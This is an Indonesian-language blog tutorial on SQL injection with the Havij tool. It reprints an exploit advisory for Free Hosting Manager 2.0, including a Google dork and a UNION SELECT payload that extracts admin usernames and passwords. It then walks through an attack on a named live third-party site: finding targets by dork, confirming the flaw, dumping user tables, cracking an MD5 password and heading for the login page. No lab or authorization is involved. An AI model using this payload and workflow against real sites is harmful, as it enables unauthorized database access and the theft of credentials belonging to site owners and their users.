SQL Injection dengan Havij

SQL Injection

SQL Injection adalah serangan yang memungkinkan attacker untuk masuk ke dalam database suatu website.

Langsung aja kita praktekkan dengan exploit berikut.

##########################################################################

# Free Hosting Manager V2.0 SQL Injection Vulnerability

# Google Dork: inurl:clients/packages.php?id=1

# Bug discovered by Yakir Wizman AKA Pr0T3cT10n, <yakir.wizman@gmail.com>

# Date: 29/11/2012

# Version: 2.0

# Software Link: http://www.fhm-script.com/download.php

# ISRAEL

##########################################################################

# Author will be not responsible for any damage.

##########################################################################

# SQL Injection PoC:

# http://www/example.com/clients/packages.php?id=1

# http://www.example.com/clients/packages.php?id=-

1'+UNION+ALL+SELECT+1,CONCAT(username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+adminusers%23

##########################################################################

# 0x31337.net

##########################################################################

1. Pertama, buka www.google.com dan masukan dork inurl:clients/packages.php?id=1
   

2. Disini kita menemukan target website, yaitu www.s8t.biz. Jangan lupa URLnya harus sama dengan P.o.C seperti yang ada di exploit, yaitu www.s8t.biz/clients/package.php?id=1.
   

3. Untuk mengetahui apakah ini websitenya vuln / ada celahnya apa nggak, tambahkan tanda petik (‘) dibelakang URL

4. Nah kalo muncul tulisan You have an error in your SQL syntax, bla bla bla berarti itu tandanya ada celah yang bisa dihajar dengan teknik SQL Injection ini. Tulisan errornya kadang tiap website berbeda-beda, tapi intinya tetep sama yang menunjukkan adanya error atau kesalahan di syntax SQL.
   

5. Lanjut ke langkah berikutnya, yaitu saatnya mengexploitasi atau menyerang. Pada tutorial ini kita akan gunakan tool Havij. Buka toolnya kemudian masukan target ke kolom Target kemudian klik Analyze. Jangan lupa, URL harus sama seperti saat kita cek vuln apa enggaknya, tapi hilangkan tanda petik.
   
   

6. Tunggu sampai proses scanning selesai, yaitu Status menjadi I’m IDLE.
   
   
   

7. Langkah selanjutnya adalah masuk ke database website target. Buka menu Tables pada havij.
   
   
   
   
   

8. Akan terlihat database yang bisa kita masuki. Seperti contoh ini ada nama database yaitu webhost. Langsung aja klik Get Tables.
   
   
   
   
   

9. Seperti gambar di bawah ini, terlihat tabel-tabel tempat menyimpan data-data website target. Kita akan coba untuk mencari data user. Cari nama table yang berhubungan dengan user atau pengguna kemudian klik Get Columns.
   
   
   
   
   

10. Misal disini kita akan membuka data username, email dan password. Beri tanda semua kemudian klik Get Data.
    
    
    

11. Dan hasilnya akan terlihat seperti dibawah ini :-).
    
    
    
    
    

12. Karena password masih dalam bentuk enkripsi (biasanya MD5). Kita crack dulu. Copy tulisan passwordnya kemudian masuk ke menu MD5.
    
    
    
    
    

13. Paste di kolom MD5 hash dan klik Start.
    
    
    

14. Terlihat hasilnya adalah andi1234.
    
    
    

15. Setelah data-data untuk login kita dapatkan, silhakan cari halaman untuk login.

Exploit SQL Injection lainnya:

• http://www.exploit-db.com/exploits/22427/
• http://www.exploit-db.com/exploits/18155/
• http://www.exploit-db.com/exploits/18212/
• http://www.exploit-db.com/exploits/16087/

Referensi tentang SQL Injection lainnya:

• http://ezine.echo.or.id/ezine2/sql_injection%5B1%5D~the_day.txt
• https://www.owasp.org/index.php/SQL_Injection

http://invisible-404.blogspot.com/2014/04/sql-injection-dengan-havij.html